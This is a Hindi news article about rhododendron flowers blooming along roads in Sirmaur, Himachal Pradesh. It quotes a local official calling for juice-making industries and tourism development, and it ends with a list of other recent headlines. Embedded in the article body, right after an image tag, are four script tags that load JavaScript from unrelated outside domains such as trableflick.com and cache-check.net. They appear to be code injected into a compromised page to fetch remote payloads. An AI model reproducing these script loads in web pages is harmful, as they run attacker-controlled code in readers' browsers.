Categories: हिमाचल

सिरमौरः बुरांस के फूल बिखेर रहे अपनी महक, सड़क किनारे खिले फूल पर्यटकों को कर रहे अभिभूत

<p>हिमाचल प्रदेश में सिरमौर जिला के पहाड़ी क्षेत्रों विशेषतया हरिपुरधार नोहराधार बड़यालटा, पिउलीलानी आदि क्षेत्रों में इन दिनों बुरांस के फूल अपनी महक बिखेर रहे हैं। कई-कई किलोमीटर तक फैले ग्रास के जंगल इन दिनों फूलों की लालिमा से सराबोर हैं। दिल्ली पंजाब और हरियाणा से हरिपुरधार की ओर जाने वाले पर्यटक सड़क के दोनों किनारों पर खिले बुरास के फूलों को निहार कर अभिभूत हो रहे हैं। हर वर्ष इन क्षेत्रों में फरवरी से अप्रैल तक बुरांस के फूल खिलने से प्रकृति की अद्भुत छटा देखने को मिलती है और पर्यटन की दृष्टि से इसका बहुत ही महत्व है।</p>

<p>पंचायत समिति संगठन के अध्यक्ष मेला राम शर्मा का कहना है कि इन दिनों बुरास के फूलों की लालिमा का नजारा देखते ही बनता है और इससे पर्यटन क्षेत्र को बढ़ावा मिलना स्वभाविक है। मालाराम शर्मा का कहना है कि बुरांस के फूलों से जूस भी बन सकता है लेकिन यहां सैकड़ों वर्षों से कई-कई टनों के हिसाब से हर साल बुरांस के फूल यूं ही बर्बाद हो जाते हैं।</p>

<p>उनका कहना है कि यदि इस क्षेत्र में सरकार द्वारा बुरांस के फूलों का जूस बनाने के लिए कोई लघु उद्योग लगाए जाएं तो इससे सैकड़ों लोगों को रोजगार उपलब्ध होने की संभावना है। उन्होंने राज्य सरकार से इस दिशा में ठोस प्रयत्न करने का आग्रह किया ताकि बेरोजगार युवाओं को रोजगार के साधन उपलब्ध हो सके। उन्होंने सरकार से आग्रह किया की अद्भुत प्राकृतिक सौंदर्य के कारण इस क्षेत्र में पर्यटन विकास की अपार संभावनाएं हैं और इस दिशा में भी सरकार को विशेष प्रयत्न की करने चाहिए।</p>

<p><img src=”/media/gallery/images/image(2490).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1615358248425″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

1 hour ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को विस्तार सुक्‍खू सरकार ने विस्‍तार दिया है।…

2 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

2 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

3 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

3 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

4 hours ago